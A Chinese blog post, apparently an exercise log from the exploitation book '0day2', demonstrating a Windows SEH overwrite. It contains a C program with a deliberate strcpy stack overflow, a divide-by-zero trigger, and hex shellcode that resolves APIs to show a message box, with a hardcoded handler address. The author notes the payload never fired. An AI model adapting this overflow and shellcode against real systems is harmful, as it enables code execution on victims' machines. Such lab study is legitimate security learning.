旧书重温：0day2【8】狙击windows的异常处理实验

现在进入0day2的第六章内容

其中第六章的书本内容我都拍成了图片格式放在了QQ空间中（博客园一张一传，太慢了）http://user.qzone.qq.com/252738331/photo/V10U5YUk464GF5/ 密码NQK3S

废话不说了，代码

// 0day2_8.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
//    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
char shellcode[] ={

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\xcc\xcc\xcc"\
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C\x8B\xF4\x8D\x7E\x0C\x33"\
"\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30"\
"\x8B\x4B\x0C\x8B\x49\x1C\x57\x56\x8B\x69\x08\x8B\x79\x20\x8B\x09\x66\x39\x57\x18\x75\xF2"\
"\x5E\x5F\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05"\
"\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4"\
"\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75\xE4\x8B\x59\x24\x03\xDD\x66"\
"\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75"\
"\xA9\x33\xDB\x53\x68\x61\x61\x61\x61\x68\x62\x62\x62\x62\x8B\xC4\x53\x50\x50\x53\xFF\x57"\
"\xFC\x53\xFF\x57\xF8"\

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9c\xfe\x12\x00"\

};
DWORD MyExceptionHandler(void)
{
printf("got an exception,press enter to kill process!\n");
getchar();
ExitProcess(1);
return 0;
}
void Test(char * input)
{
char buf[200];
int zero = 0;
//__asm int 3
//printf("len %d \n",strlen(shellcode));
//_asm int 3
__try
{
strcpy(buf,input);

zero=4/zero;
}
__except(MyExceptionHandler()){}
}
int main(int argc, char* argv[])
{
/*_asm{

lea eax,dword ptr shellcode
call eax
}*/
Test(shellcode);
return 0;
}

这个实验 做了好久，弄了也好久，最后：我们可爱的msg就是弹不出来，打击了我的积极性，所以搁置了好久！

----------------------------------------------------

| QQ252738331

| Q群： 104132152（群名称是缓冲区溢出|汇编|逆向）

| 微博： http://t.qq.com/zhenw0
----------------------------------------------------